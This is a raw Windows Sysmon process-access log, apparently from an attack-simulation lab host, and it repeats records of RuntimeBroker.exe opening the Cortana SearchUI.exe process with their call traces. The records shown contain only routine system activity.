12:02:31.648{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 